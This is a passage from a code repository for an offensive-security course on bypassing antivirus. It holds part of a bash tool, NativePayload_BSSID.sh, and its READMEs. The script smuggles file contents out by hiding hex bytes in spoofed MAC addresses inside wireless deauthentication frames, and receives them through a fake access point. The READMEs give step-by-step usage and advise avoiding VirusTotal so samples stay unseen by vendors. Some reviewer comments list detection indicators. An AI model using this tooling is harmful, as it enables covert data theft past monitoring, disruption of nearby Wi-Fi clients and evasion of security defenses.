in `strings $2 | xxd -p -c 5 | sed 's/../&:/g'`; 479 | do 480 | tput setaf 2; 481 | Exfil="${bytes::-1}" 482 | text=`echo $Exfil | xxd -r -p` 483 | 484 | tput setaf 10; 485 | 486 | if [ "$id" == "0" ] ; 487 | then 488 | Random1="0" 489 | id="1" 490 | elif [ "$id" == "1" ] ; 491 | then 492 | Random1="1" 493 | id="2" 494 | elif [ "$id" == "2" ] ; 495 | then 496 | Random1="2" 497 | id="3" 498 | elif [ "$id" == "3" ] ; 499 | then 500 | Random1="3" 501 | id="4" 502 | elif [ "$id" == "4" ] ; 503 | then 504 | Random1="4" 505 | id="5" 506 | elif [ "$id" == "5" ] ; 507 | then 508 | Random1="5" 509 | id="6" 510 | elif [ "$id" == "6" ] ; 511 | then 512 | Random1="6" 513 | id="7" 514 | elif [ "$id" == "7" ] ; 515 | then 516 | Random1="7" 517 | id="8" 518 | elif [ "$id" == "8" ] ; 519 | then 520 | Random1="8" 521 | id="9" 522 | elif [ "$id" == "9" ] ; 523 | then 524 | Random1="9" 525 | id="a" 526 | elif [ "$id" == "a" ] ; 527 | then 528 | Random1="a" 529 | id="b" 530 | elif [ "$id" == "b" ] ; 531 | then 532 | Random1="b" 533 | id="c" 534 | elif [ "$id" == "c" ] ; 535 | then 536 | Random1="c" 537 | id="d" 538 | elif [ "$id" == "d" ] ; 539 | then 540 | Random1="d" 541 | id="e" 542 | elif [ "$id" == "e" ] ; 543 | then 544 | Random1="e" 545 | id="f" 546 | elif [ "$id" == "f" ] ; 547 | then 548 | Random1="f" 549 | id="0" 550 | fi 551 | #sleep 0.1 552 | tempaddress=`echo "0$Random1:$Exfil:20:20:20:20:20:20" | head -c17` 553 | sleep 0.2 554 | if [ "$6" == "fast" ] ; 555 | then 556 | echo "$(tput setaf 2)[!]:Sending [$(tput setaf 11)"$text"$(tput setaf 2)] via DeAuth.Cli.BSSID.[$(tput setaf 3)$tempaddress$(tput setaf 2)]" "to Target AP.[$(tput setaf 3)"$3"$(tput setaf 2)]$(tput setaf 10) Done." 
557 | aireplay-ng -0 1 -a "$3" -c $tempaddress "$4" & 558 | sleep 0.2 559 | elif [ "$6" == "faster" ] ; 560 | then 561 | echo "$(tput setaf 2)[!]:Sending [$(tput setaf 11)"$text"$(tput setaf 2)] via DeAuth.Cli.BSSID.[$(tput setaf 3)$tempaddress$(tput setaf 2)]" "to Target AP.[$(tput setaf 3)"$3"$(tput setaf 2)]$(tput setaf 10) Done." 562 | aireplay-ng -0 1 -a "$3" -c $tempaddress "$4" & 563 | 564 | #if [ "$id" == "f" ]; 565 | #then 566 | #sleep 1.5 567 | #fi 568 | else 569 | Time=`date '+%d/%m/%Y %H:%M:%S'` 570 | echo "$(tput setaf 2)[!]:[$Time] Sending [$(tput setaf 11)"$text"$(tput setaf 2)] via DeAuth.Cli.BSSID.[$(tput setaf 3)$tempaddress$(tput setaf 2)]" "to Target AP.[$(tput setaf 3)"$3"$(tput setaf 2)]$(tput setaf 10) Done." 571 | sleep 0.2 572 | out=`aireplay-ng -0 1 -a "$3" -c $tempaddress "$4" | grep "Sending"` 573 | if [ "$6" == "dbg" ] ; 574 | then 575 | echo "$(tput setaf 14)$out" 576 | fi 577 | fi 578 | 579 | done 580 | 581 | tput setaf 6; 582 | Time=`date '+%d/%m/%Y %H:%M:%S'` 583 | echo "[>]:[$Time] Sending Finish Flag [00:ff:00:ff:00:ff] to AccessPoint: $3" 584 | aireplay-ng -0 1 -a "$3" -c "00:ff:00:ff:00:ff" "$4" | grep "error ;)" 585 | Time=`date '+%d/%m/%Y %H:%M:%S'` 586 | echo "[>]:[$Time] Exfiltration via Deauthentication Packets Done." 
fi
############################### ExfilDeauth v2 (Command-based send) ###############################

############################### ExfilDeauth v2 (Command-based receive) ###############################
# ExfilDeauthDumps_CmdBased "fakev2" wlan1mon channel BSSID-optional
#
# Receive side of the deauth-based transfer in its command-line form (the -deauthdumps switch).
# Arguments: $1 fake-AP ESSID  (empty -> "DefaultFakeAP")
#            $2 monitor-mode interface
#            $3 wifi channel
#            $4 fake-AP BSSID  (empty -> 00:11:22:33:44:55)
# Brings up a fake AP with airbase-ng, captures the tcpdump lines containing "DeAuthentication"
# on $2, and once the finish-flag address 00:ff:00:ff:00:ff appears in the capture takes field 12
# of every captured line (presumably the station address -- confirm against tcpdump's line
# format), strips the known addresses and the "00:".."0f:" pairs, hex-decodes what is left and
# saves it.  Never returns: after each message the capture is restarted and the wait begins again.
# Files written to the working directory: kill.txt, airbase_output.txt, DeauthPayloadDumps.txt,
# DeAuthbytes.txt, ExfilOutput_<timestamp>.txt.
# NOTE(review): the default BSSID, the default ESSID and the finish-flag address never change
# between runs, which makes them simple indicators for wireless monitoring to alert on.
# NOTE(review): the file starts with #!/bin/sh but this function uses [[ ]] and (( )), so it
# only works when run under bash.
function ExfilDeauthDumps_CmdBased
{
  # Best-effort cleanup of a previous run; both jobs redirect to the same kill.txt and
  # any "no process found" error is ignored.
  nohup killall airbase-ng > "kill.txt" 2>&1 &
  nohup killall tcpdump > "kill.txt" 2>&1 &
  tput setaf 2;
  FakeAp="$1";
  defaultBSSID="$4"
  if [[ "$1" == "" || "$1" == " " ]]
  then
    FakeAp="DefaultFakeAP";
  fi
  if [ "$4" == "" ]
  then
    defaultBSSID="00:11:22:33:44:55"
  fi

  Time=`date '+%d/%m/%Y %H:%M:%S'`
  echo "$(tput setaf 2)[>]:[$Time]:Default AP.BSSID.[$(tput setaf 3)$defaultBSSID$(tput setaf 2)]:$(tput setaf 10)Created$(tput setaf 2)"
  # The fake AP stays up in the background for the whole session; its output goes to airbase_output.txt.
  nohup airbase-ng -a "$defaultBSSID" --essid "$FakeAp" -I 10 -0 "$2" -c "$3" > "airbase_output.txt" 2>&1 &
  Time=`date '+%d/%m/%Y %H:%M:%S'`
  echo "$(tput setaf 2)[>]:[$Time]:Default AP.ESSID.[$(tput setaf 3)$FakeAp$(tput setaf 2)] with Wifi Channel.[$(tput setaf 3)$3$(tput setaf 2)] via Interface.[$(tput setaf 3)$2$(tput setaf 2)]:$(tput setaf 10)Started$(tput setaf 2)"
  tput setaf 10;
  sleep 1.5
  # A backgrounded pipeline inside a command substitution: $out is always empty and is never read;
  # the tcpdump | grep pipeline keeps running and fills DeauthPayloadDumps.txt.
  out=`nohup tcpdump -i "$2" -n | grep "DeAuthentication" > "DeauthPayloadDumps.txt" &`
  sleep 1
  counter=0
  # Outer loop: one iteration per received message.
  while true
  do
    Time=`date '+%d/%m/%Y %H:%M:%S'`
    echo "$(tput setaf 2)[>]:[$Time]:$(tput setaf 3)$2$(tput setaf 2) Packet Monitoring for DeAuthentication Traffic:$(tput setaf 10)Started$(tput setaf 2)"
    printf "[>]:[$Time]:$(tput setaf 3)$2$(tput setaf 2) Packet Monitoring "
    # Inner loop: poll the capture file every 3.5 s until the finish flag is in it.
    while true
    do
      tput setaf 3;
      # progress dot once every four polls
      if (( $counter > 3 ))
      then
        printf '.'
        counter=0
      fi
      tput setaf 2;
      FinishFlag=`strings "DeauthPayloadDumps.txt" | grep "00:ff:00:ff:00:ff"`
      # non-empty grep result == finish flag seen
      if (( `echo ${#FinishFlag}` !=0 ))
      then
        tput setaf 10;
        Time=`date '+%d/%m/%Y %H:%M:%S'`
        echo ""
        echo "$(tput setaf 2)[!]:[$Time]:Finish Flag:$(tput setaf 10)Detected$(tput setaf 2)"
        break;
      fi
      ((counter++))
      sleep 3.5
    done
    # Earlier variant of the decode step, kept for reference (it did not drop $defaultBSSID and did not hex-decode):
    # `strings "DeauthPayloadDumps.txt" | awk {'print $12'} | awk '!a[$0]++' | sed 's/00:ff:00:ff:00:ff//g' | sed 's/00:FF:00:FF:00:FF//g' | sed 's/00:11:22:33:44:55//g' | sed 's/00://g' | sed 's/01://g' | sed 's/02://g' | sed 's/03://g' | sed 's/04://g' | sed 's/05://g' | sed 's/06://g' | sed 's/07://g' | sed 's/08://g' | sed 's/09://g' | sed 's/0a://g' | sed 's/0b://g' | sed 's/0c://g' | sed 's/0d://g' | sed 's/0e://g' | sed 's/0f://g' > "DeAuthbytes1.txt" `
    # Decode: field 12 of every captured line, de-duplicated in order of first appearance
    # (awk '!a[$0]++'), minus the fake-AP BSSID, the finish flag and every "00:".."0f:" pair,
    # then hex -> bytes into DeAuthbytes.txt.  The surrounding backticks run the pipeline and
    # then execute its output as a command, which is a no-op because the output is redirected.
    # NOTE(review): the "0X:" substitutions are global, so a payload octet in the range 00-0f
    # that is followed by ':' is removed as well -- confirm against the sender's encoding.
    `strings "DeauthPayloadDumps.txt" | awk {'print $12'} | awk '!a[$0]++' | sed "s/$defaultBSSID//g" | sed 's/00:ff:00:ff:00:ff//g' | sed 's/00:FF:00:FF:00:FF//g' | sed 's/00:11:22:33:44:55//g' | sed 's/00://g' | sed 's/01://g' | sed 's/02://g' | sed 's/03://g' | sed 's/04://g' | sed 's/05://g' | sed 's/06://g' | sed 's/07://g' | sed 's/08://g' | sed 's/09://g' | sed 's/0a://g' | sed 's/0b://g' | sed 's/0c://g' | sed 's/0d://g' | sed 's/0e://g' | sed 's/0f://g' | xxd -r -p > "DeAuthbytes.txt" `
    payload=`cat DeAuthbytes.txt`
    Time=`date '+%d/%m/%Y %H:%M:%S'`
    echo "$(tput setaf 2)[!]:[$Time]:Payload Dumping:$(tput setaf 10)Done$(tput setaf 2)."
    echo "$(tput setaf 2)[!]:[$Time]:Text/Data Dumped:$(tput setaf 11) $payload$(tput setaf 2)"
    # Stop the capture (in the background; the two 0.5 s sleeps below presumably give it time
    # to exit before the dump file is truncated).
    nohup killall tcpdump > "kill.txt" 2>&1 &
    Timestr=`date '+%d-%m-%Y.%H-%M-%S'`
    echo " " > "ExfilOutput_$Timestr.txt"
    # Unquoted expansion: the saved copy is word-split and glob-expanded, so whitespace runs
    # and any glob characters in the decoded data are not preserved exactly.
    echo $payload > "ExfilOutput_$Timestr.txt"
    echo "$(tput setaf 2)[>]:[$Time]:Text/Data Saved to $(tput setaf 10)\"ExfilOutput_$Timestr.txt\"$(tput setaf 2)"
    tput setaf 2;
    sleep 0.5;
    # Truncate the dump and restart the capture for the next message (same backtick-and-background pattern as above).
    echo "" > "DeauthPayloadDumps.txt"
    sleep 0.5;
    tput setaf 10;
    `nohup tcpdump -i "$2" -n | grep "DeAuthentication" > "DeauthPayloadDumps.txt" 2>&1 & `
  done
}
############################### ExfilDeauth v2 (Command-based receive) ###############################

# Unquoted $1: with no argument at all this test reports "unary operator expected" instead of being false.
if [ $1 == "-deauthdumps" ]
then
  # ExfilDeauthDumps_CmdBased "fakev2" wlan1mon channel
  ExfilDeauthDumps_CmdBased "$2" "$3" "$4" "$5"
fi

# Coloured help text covering the v1 (-f / -s) and v2 (-deauthdumps / -exfildeauth / -exfilserver) switches.
if [ $1 == "help" ]
then
  tput setaf 2;
  echo "$(tput setaf 10)--------------------------------------------------------"
  echo "$(tput setaf 2)NativePayload_BSSID.sh$(tput setaf 11) v1 $(tput setaf 2)Syntax: "
  echo
  echo "$(tput setaf 3)Step1 (Client Side):"
  echo "$(tput setaf 2)Syntax :$(tput setaf 10)./NativePayload_BSSID.sh -f $(tput setaf 14)[text-file] $(tput setaf 6)[Fake-AP-Name] $(tput setaf 11)[MonitorMode-Interface]"
  echo "$(tput setaf 2)Example [System A]:$(tput setaf 10)./NativePayload_BSSID.sh -f $(tput setaf 14)mytext.txt $(tput setaf 6)myfakeAP $(tput setaf 11)Wlan3mon"
  echo
  echo "$(tput setaf 3)Step2 (Server Side):"
  echo "$(tput setaf 2)Syntax :$(tput setaf 10)./NativePayload_BSSID.sh -s $(tput setaf 14)[Wifi-Interface] $(tput setaf 6)[Exfil-Dump-file]"
  echo "$(tput setaf 2)Example [System B]:$(tput setaf 10)./NativePayload_BSSID.sh -s $(tput setaf 14)wlan0 $(tput setaf 6)ExfilDumped.txt"
  echo
  echo "$(tput setaf 3)Description:$(tput setaf 2) with Step1 (system A) you 
will inject bytes for (mytext.txt) file to BSSID for Fake AP in this case (myfakeAP) , with Step2 on (system B) you can have this text file via Scanning Fake AP on AIR by Wireless traffic (Using iwlist tool)" 686 | echo "Note : before step1 you should make Monitor-Mode Interface (WlanXmon) by this command for example : $(tput setaf 10)airmon-ng start wlan3 " 687 | echo "$(tput setaf 10)--------------------------------------------------------" 688 | echo "$(tput setaf 2)NativePayload_BSSID.sh$(tput setaf 11) v2 $(tput setaf 2)Syntax I: " 689 | echo 690 | echo "$(tput setaf 3)Step1 (Server Side):" 691 | echo "$(tput setaf 2)Syntax :$(tput setaf 10)./NativePayload_BSSID.sh -deauthdumps $(tput setaf 14)[FakeAP-ESSID] $(tput setaf 6)[MonitorMode-Interface]$(tput setaf 11) [Wifi-Channel] $(tput setaf 3)[FakeAP-BSSID]" 692 | echo "$(tput setaf 2)Example [System B]:$(tput setaf 10)./NativePayload_BSSID.sh -deauthdumps $(tput setaf 14)MyFakeAP $(tput setaf 6)wlan1mon$(tput setaf 11) 7 $(tput setaf 3)00:12:32:44:64:19" 693 | echo 694 | echo "$(tput setaf 3)Step2 (Client Side):" 695 | echo "$(tput setaf 2)Syntax :$(tput setaf 10)./NativePayload_BSSID.sh -exfildeauth $(tput setaf 14)[text-file] $(tput setaf 6)[Target-FakeAP-BSSID] $(tput setaf 11)[Wifi-Interface] $(tput setaf 3)[Wifi-Channel] $(tput setaf 4)[dbg]/[fast]/[faster]" 696 | echo "$(tput setaf 2)Example [System A]:$(tput setaf 10)./NativePayload_BSSID.sh -exfildeauth $(tput setaf 14)mypayload.txt $(tput setaf 6)00:12:32:44:64:19 $(tput setaf 11)wlan2 $(tput setaf 3)7 $(tput setaf 4)faster" 697 | echo 698 | echo "$(tput setaf 3)Description:$(tput setaf 2) with Step1 (system B) you will have Fake AP via wlanXmon interface also DeAuth Packets will Dump via Tcpdump tool in this step in server side , Note: before step1 you should make WlanXmon Monitor-Mode Interface by this command : $(tput setaf 10)airmon-ng start wlanX " 699 | echo "$(tput setaf 2)with Step2 your Client (system A) will send that text file to 
(Target/system B) via DeAuth Packets On AIR Directly..." 700 | echo "Note: $(tput setaf 10)via Step2 your Payload Injected to Client.BSSIDs in DeAuth Packets." 701 | echo "$(tput setaf 10)--------------------------------------------------------" 702 | echo "$(tput setaf 2)NativePayload_BSSID.sh$(tput setaf 11) v2 $(tput setaf 2)Syntax II: " 703 | echo "$(tput setaf 3)(Server/Client Side):" 704 | echo "$(tput setaf 2)Syntax :$(tput setaf 10)./NativePayload_BSSID.sh -exfilserver" 705 | echo "$(tput setaf 3)Description:$(tput setaf 2) for more information please read PDF/Article on Github..." 706 | echo "$(tput setaf 10)--------------------------------------------------------" 707 | 708 | fi 709 | 710 | # myrecords="" 711 | # ChatInputArray=() 712 | # base64isonoff="false" 713 | # isb64="false" 714 | # iscmdshellonoff="off" 715 | isdebug="off" 716 | ExfilMode="bssid" 717 | server_client_Mode="server" 718 | 719 | if [ $1 == "-exfilserver" ]; 720 | then 721 | 722 | while [ "$input" != "exit" ] 723 | do 724 | while true ; 725 | do 726 | 727 | if [ $ExfilMode == "bssid" ] ; 728 | then 729 | 730 | if [ "$server_client_Mode" == "client" ] 731 | then 732 | read -p "$(tput setaf 2)[>]:WIFI::Chat:input:[$(tput setaf 3)Client$(tput setaf 2)][$(tput setaf 3)BSSID$(tput setaf 2)]#$(tput setaf 11) " input 733 | else 734 | read -p "$(tput setaf 2)[>]:WIFI::Chat:input:[$(tput setaf 3)Server$(tput setaf 2)][$(tput setaf 3)BSSID$(tput setaf 2)]#$(tput setaf 11) " input 735 | fi 736 | else 737 | 738 | if [ "$server_client_Mode" == "client" ] 739 | then 740 | read -p "$(tput setaf 2)[>]:WIFI::Chat:input:[$(tput setaf 3)Client$(tput setaf 2)][$(tput setaf 3)DeAuth$(tput setaf 2)]#$(tput setaf 11) " input 741 | else 742 | read -p "$(tput setaf 2)[>]:WIFI::Chat:input:[$(tput setaf 3)Server$(tput setaf 2)][$(tput setaf 3)DeAuth$(tput setaf 2)]#$(tput setaf 11) " input 743 | fi 744 | fi 745 | tput setaf 2 746 | if [[ $input == "@exit" ]] 747 | then 748 | exit ; 749 | elif [[ "$input" == 
"@clear" ]] ; 750 | then 751 | clear ; 752 | elif [[ "$input" == "@help" ]] ; 753 | then 754 | _help "$server_client_Mode" ; 755 | elif [[ "$input" == "@clientmode" || "$input" == "@cli" ]] ; 756 | then 757 | tput setaf 10 758 | echo "[@]:ChatMode::Client.Mode:On" 759 | tput setaf 2 760 | server_client_Mode="client" 761 | elif [[ "$input" == "@servermode" || "$input" == "@serv" ]] ; 762 | then 763 | tput setaf 10 764 | echo "[@]:ChatMode::Server.Mode:On" 765 | nohup killall airbase-ng > "killairbase.txt" 2>&1 & 766 | tput setaf 2 767 | server_client_Mode="server" 768 | elif [[ "$input" == "@run" ]] ; 769 | then 770 | if [ "$server_client_Mode" == "server" ] 771 | then 772 | tput setaf 10 773 | if [ "$ExfilMode" == "bssid" ] 774 | then 775 | echo "[@]:ChatMode::ServerSide.[Bssid].Scanning.AccessPoints:Started" 776 | break; 777 | else 778 | echo "[@]:ChatMode::ServerSide.[DeAuth].Scanning.Mode:Started" 779 | break; 780 | fi 781 | else 782 | tput setaf 10 783 | echo "[@]:this command supported in [ServerSide] only" 784 | fi 785 | tput setaf 2 786 | elif [[ "$input" == "@dbgon" ]] ; 787 | then 788 | tput setaf 10 789 | echo "[@]:ChatMode::Debug.ShowDetails:On" 790 | tput setaf 2 791 | isdebug="on" 792 | elif [[ "$input" == "@dbgoff" ]] ; 793 | then 794 | tput setaf 10 795 | echo "[@]:ChatMode::Debug.ShowDetails:Off" 796 | tput setaf 2 797 | isdebug="off" 798 | elif [[ "$input" == "@bssid" || "$input" == "bssid" ]] ; 799 | then 800 | tput setaf 10 801 | ExfilMode="bssid" 802 | echo "[@]:ChatMode::SendbyBSSID:On" 803 | tput setaf 2 804 | elif [[ "$input" == "@deauth" ]] ; 805 | then 806 | tput setaf 10 807 | ExfilMode="deauth" 808 | echo "[@]:ChatMode::SendbyDeAuth:On" 809 | tput setaf 2 810 | elif [[ $input != '' && $input != "@"* && "$server_client_Mode" == "client" ]] ; 811 | then 812 | break; 813 | elif [[ $input != '' && $input == "@run" && "$server_client_Mode" == "server" ]] ; 814 | then 815 | break; 816 | else 817 | Again="Again;)" 818 | fi 819 | done 820 | 821 | 
if [ "$ExfilMode" == "bssid" ] 822 | then 823 | if [ "$server_client_Mode" == "client" ] 824 | then 825 | if [ "$isdebug" == "off" ] 826 | then 827 | 828 | nohup killall airbase-ng > "kill.txt" 2>&1 & 829 | while true ; 830 | do 831 | read -p "$(tput setaf 2)[>]:WIFI::Monitor.Mode.[Interface]:input:[$(tput setaf 3)wlan0mon$(tput setaf 2)]#$(tput setaf 11) " input2 832 | if [ "$input2" != '' ] 833 | then 834 | break 835 | fi 836 | done 837 | sendBssids "$input" "fake" "$input2" "false" 838 | else 839 | nohup killall airbase-ng > "kill.txt" 2>&1 & 840 | while true ; 841 | do 842 | read -p "$(tput setaf 2)[>]:WIFI::Monitor.Mode.[Interface]:input:[$(tput setaf 3)wlan0mon$(tput setaf 2)]#$(tput setaf 11) " input2 843 | if [ "$input2" != '' ] 844 | then 845 | break 846 | fi 847 | done 848 | sendBssids "$input" "fake" "$input2" "true" 849 | fi 850 | else 851 | if [ "$isdebug" == "off" ] 852 | then 853 | while true ; 854 | do 855 | read -p "$(tput setaf 2)[>]:WIFI::Wlan.[Interface]:input:[$(tput setaf 3)wlan0$(tput setaf 2)]#$(tput setaf 11) " input2 856 | if [ "$input2" != '' ] 857 | then 858 | break 859 | fi 860 | done 861 | receiveBssids "$input2" "myExfildump.txt" "false" 862 | else 863 | while true ; 864 | do 865 | read -p "$(tput setaf 2)[>]:WIFI::Wlan.[Interface]:input:[$(tput setaf 3)wlan0$(tput setaf 2)]#$(tput setaf 11) " input2 866 | if [ "$input2" != '' ] 867 | then 868 | break 869 | fi 870 | done 871 | receiveBssids "$input2" "myExfildump.txt" "true" 872 | fi 873 | 874 | fi 875 | 876 | fi 877 | if [ "$ExfilMode" == "deauth" ] 878 | then 879 | if [ "$server_client_Mode" == "client" ] 880 | then 881 | if [ "$isdebug" == "off" ] 882 | then 883 | while true ; 884 | do 885 | read -p "$(tput setaf 2)[>]:WIFI::Wlan.[Interface]:input:[$(tput setaf 3)wlan0$(tput setaf 2)]#$(tput setaf 11) " wlan_input2 886 | if [ "$wlan_input2" != '' ] 887 | then 888 | break 889 | fi 890 | done 891 | while true ; 892 | do 893 | read -p "$(tput setaf 
2)[>]:WIFI::Wlan.[Channel]:input:[$(tput setaf 3)1$(tput setaf 2)]#$(tput setaf 11) " channel_input3 894 | if [ "$channel_input3" != '' ] 895 | then 896 | break 897 | fi 898 | done 899 | ExfilDeauth "$input" "00:11:22:33:44:55" "$wlan_input2" "$channel_input3" "false" 900 | else 901 | while true ; 902 | do 903 | read -p "$(tput setaf 2)[>]:WIFI::Wlan.[Interface]:input:[$(tput setaf 3)wlan0$(tput setaf 2)]#$(tput setaf 11) " wlan_input2 904 | if [ "$wlan_input2" != '' ] 905 | then 906 | break 907 | fi 908 | done 909 | while true ; 910 | do 911 | read -p "$(tput setaf 2)[>]:WIFI::Wlan.[Channel]:input:[$(tput setaf 3)1$(tput setaf 2)]#$(tput setaf 11) " channel_input3 912 | if [ "$channel_input3" != '' ] 913 | then 914 | break 915 | fi 916 | done 917 | ExfilDeauth "$input" "00:11:22:33:44:55" "$wlan_input2" "$channel_input3" "true" 918 | fi 919 | else 920 | if [ "$isdebug" == "off" ] 921 | then 922 | while true ; 923 | do 924 | read -p "$(tput setaf 2)[>]:WIFI::WlanMon.[Interface]:input:[$(tput setaf 3)wlan1mon$(tput setaf 2)]#$(tput setaf 11) " wlanmon_input2 925 | if [ "$wlanmon_input2" != '' ] 926 | then 927 | break 928 | fi 929 | done 930 | while true ; 931 | do 932 | read -p "$(tput setaf 2)[>]:WIFI::WlanMon.[Channel]:input:[$(tput setaf 3)1$(tput setaf 2)]#$(tput setaf 11) " channelmon_input3 933 | if [ "$channelmon_input3" != '' ] 934 | then 935 | break 936 | fi 937 | done 938 | ExfilDeauthDumps "" "$wlanmon_input2" "$channelmon_input3" "false" 939 | else 940 | while true ; 941 | do 942 | read -p "$(tput setaf 2)[>]:WIFI::WlanMon.[Interface]:input:[$(tput setaf 3)wlan1mon$(tput setaf 2)]#$(tput setaf 11) " wlanmon_input2 943 | if [ "$wlanmon_input2" != '' ] 944 | then 945 | break 946 | fi 947 | done 948 | while true ; 949 | do 950 | read -p "$(tput setaf 2)[>]:WIFI::WlanMon.[Channel]:input:[$(tput setaf 3)1$(tput setaf 2)]#$(tput setaf 11) " channelmon_input3 951 | if [ "$channelmon_input3" != '' ] 952 | then 953 | break 954 | fi 955 | done 956 | 
ExfilDeauthDumps "" "$wlanmon_input2" "$channelmon_input3" "true" 957 | fi 958 | 959 | fi 960 | fi 961 | 962 | done 963 | fi 964 | ################################################## version 2 ################################################## 965 | -------------------------------------------------------------------------------- /Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/NativePayload_BSSIDv2/README.md: -------------------------------------------------------------------------------- 1 | # NativePayload_BSSID.sh v2 2 | 3 | Exfiltration via Wireless DeAuthentication Packets from Client to Server on AIR (without user-pass or Wifi Connection & very fast) 4 | 5 | Note: this code tested in kali linux systems (only). 6 | 7 | Article/Pdf and New video will Publish here soon... 8 | 9 | Video[1] , NativePayload_BSSID.sh v2 (step by step) : https://www.youtube.com/watch?v=rg-O4RKt9OA 10 | 11 | as you can see in this "Picture 1", with this switch "help" you can see Help information : ./NativePayload_BSSID.sh help 12 | 13 | ![](https://github.com/DamonMohammadbagher/NativePayload_BSSID/blob/master/Chapter%209%20-%20Transferring%20Backdoor%20Payload%20by%20Wireless%20Traffic%20-BSSID/NativePayload_BSSIDv2/NativePayload_BSSID%20help.png) 14 | Picture 1: 15 | 16 | # NativePayload_BSSID.sh (help): 17 | 18 | NativePayload_BSSID.sh v1 Syntax: 19 | 20 | Step1 (Client Side): 21 | Syntax :./NativePayload_BSSID.sh -f [text-file] [Fake-AP-Name] [MonitorMode-Interface] 22 | Example [System A]:./NativePayload_BSSID.sh -f mytext.txt myfakeAP Wlan3mon 23 | 24 | Step2 (Server Side): 25 | Syntax :./NativePayload_BSSID.sh -s [Wifi-Interface] [Exfil-Dump-file] 26 | Example [System B]:./NativePayload_BSSID.sh -s wlan0 ExfilDumped.txt 27 | 28 | Description: with Step1 (system A) you will inject bytes for (mytext.txt) file to BSSID for Fake AP in this case (myfakeAP) , 29 | with Step2 on (system B) you can have this text file via Scanning Fake AP on AIR by Wireless traffic 
(Using iwlist tool) 30 | Note : before step1 you should make Monitor-Mode Interface (WlanXmon) by this command for example : airmon-ng start wlan3 31 | -------------------------------------------------------- 32 | NativePayload_BSSID.sh v2 Syntax I: 33 | 34 | Step1 (Server Side): 35 | Syntax :./NativePayload_BSSID.sh -deauthdumps [FakeAP-ESSID] [MonitorMode-Interface] [Wifi-Channel] [FakeAP-BSSID] 36 | Example [System B]:./NativePayload_BSSID.sh -deauthdumps MyFakeAP wlan1mon 7 00:12:32:44:64:19 37 | 38 | Step2 (Client Side): 39 | Syntax :./NativePayload_BSSID.sh -exfildeauth [text-file] [Target-FakeAP-BSSID] [Wifi-Interface] [Wifi-Channel] [dbg]/[fast]/[faster] 40 | Example [System A]:./NativePayload_BSSID.sh -exfildeauth mypayload.txt 00:12:32:44:64:19 wlan2 7 faster 41 | 42 | Description: with Step1 (system B) you will have Fake AP via wlanXmon interface also DeAuth Packets will Dump via Tcpdump 43 | tool in this step in server side , 44 | Note: before step1 you should make WlanXmon Monitor-Mode Interface by this command : airmon-ng start wlanX 45 | with Step2 your Client (system A) will send that text file to (Target/system B) via DeAuth Packets On AIR Directly... 46 | note: via Step2 your Payload Injected to Client.BSSIDs in DeAuth Packets. 47 | -------------------------------------------------------- 48 | NativePayload_BSSID.sh v2 Syntax II: 49 | 50 | (Server/Client Side): 51 | Syntax :./NativePayload_BSSID.sh -exfilserver 52 | Description: for more information please read PDF/Article on Github... (soon) 53 | -------------------------------------------------------- 54 | 55 | -------------------------------------------------------------------------------------- 56 | 57 | # NativePayload_BSSID.sh v2 58 | # and DeAuth Method (step by step): 59 | 60 | Step 1 : 61 | with switch "-deauthdumps" you will have Fake AP via wlanXmon interface also DeAuth Packets will Dump via Tcpdump 62 | tool in this step in server side. 
63 | 64 | Note: before step 1 you should create the WlanXmon monitor-mode interface with this command : airmon-ng start wlanX 65 | 66 | Step1 (Server Side): 67 | Example [System B]:./NativePayload_BSSID.sh -deauthdumps MyFakeAP wlan1mon 7 00:12:32:44:64:19 68 | 69 | 70 | ![](https://github.com/DamonMohammadbagher/NativePayload_BSSID/blob/master/Chapter%209%20-%20Transferring%20Backdoor%20Payload%20by%20Wireless%20Traffic%20-BSSID/NativePayload_BSSIDv2/NativePayload_BSSID%20Step1.png) 71 | Picture 2: 72 | 73 | Step 2 : 74 | in Step 2 the client (system A) sends that text file directly to the target (system B) over the air via DeAuth packets... 75 | note: in Step 2 the payload is injected into the client BSSIDs carried in the DeAuth packets. 76 | 77 | Step2 (Client Side): 78 | Example [System A]:./NativePayload_BSSID.sh -exfildeauth mypayload.txt 00:12:32:44:64:19 wlan2 7 faster 79 | 80 | ![](https://github.com/DamonMohammadbagher/NativePayload_BSSID/blob/master/Chapter%209%20-%20Transferring%20Backdoor%20Payload%20by%20Wireless%20Traffic%20-BSSID/NativePayload_BSSIDv2/NativePayload_BSSID%20Step2.png) 81 | Picture 3: 82 | 83 | as you can see in "Picture 4", after 5 seconds the text file "3.txt" has been exfiltrated from client to server over the air (very simple). 84 | 85 | ![](https://github.com/DamonMohammadbagher/NativePayload_BSSID/blob/master/Chapter%209%20-%20Transferring%20Backdoor%20Payload%20by%20Wireless%20Traffic%20-BSSID/NativePayload_BSSIDv2/NativePayload_BSSID%20Step4.png) 86 | Picture 4: 87 | 88 | Article and PDF file will be published here soon... 
89 | 90 | Video STEP BY STEP : https://www.youtube.com/watch?v=rg-O4RKt9OA 91 | 92 | -------------------------------------------------------------------------------- /Chapter 9 - Transferring Backdoor Payload by Wireless Traffic -BSSID/README.md: -------------------------------------------------------------------------------- 1 | # Course : Bypassing Anti Viruses by C#.NET Programming 2 | 3 | Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 9 : Transferring Backdoor Payload by Wireless Traffic (BSSID) 4 | 5 | eBook : Bypassing Anti Viruses by C#.NET Programming 6 | 7 | eBook chapter 9 , PDF Download : https://github.com/DamonMohammadbagher/eBook-BypassingAVsByCSharp/tree/master/CH9 8 | 9 | Related Video : 10 | 11 | Video 1 C# Code : https://youtu.be/W0dJGln3tls 12 | 13 | Video 2 Script Code : https://www.youtube.com/watch?v=i6Y5BmJXWko 14 | 15 | 16 | Warning :Don't Use "www.virustotal.com" or something like that , Never Ever ;D 17 | 18 | Recommended: 19 | 20 | STEP 1 : Use each AV one by one in your LAB . 21 | 22 | STEP 2 : after "AV Signature Database Updated" your Internet Connection should be "Disconnect" . 23 | 24 | STEP 3 : Now you can Copy and Paste your C# code to your Virtual Machine for test . 

# NativePayload_BSSID.sh help :

Example Step1: (Client Side ) ./NativePayload_BSSID.sh -f text-file Fake-AP-Name MonitorMode-Interface

Example Step2: (Server Side ) ./NativePayload_BSSID.sh -s wlanx Exfil-Dump-file

example System A : ./NativePayload_BSSID.sh -f mytext.txt myfakeAP Wlan3mon

example System B : ./NativePayload_BSSID.sh -s wlan0 ExfilDumped.txt

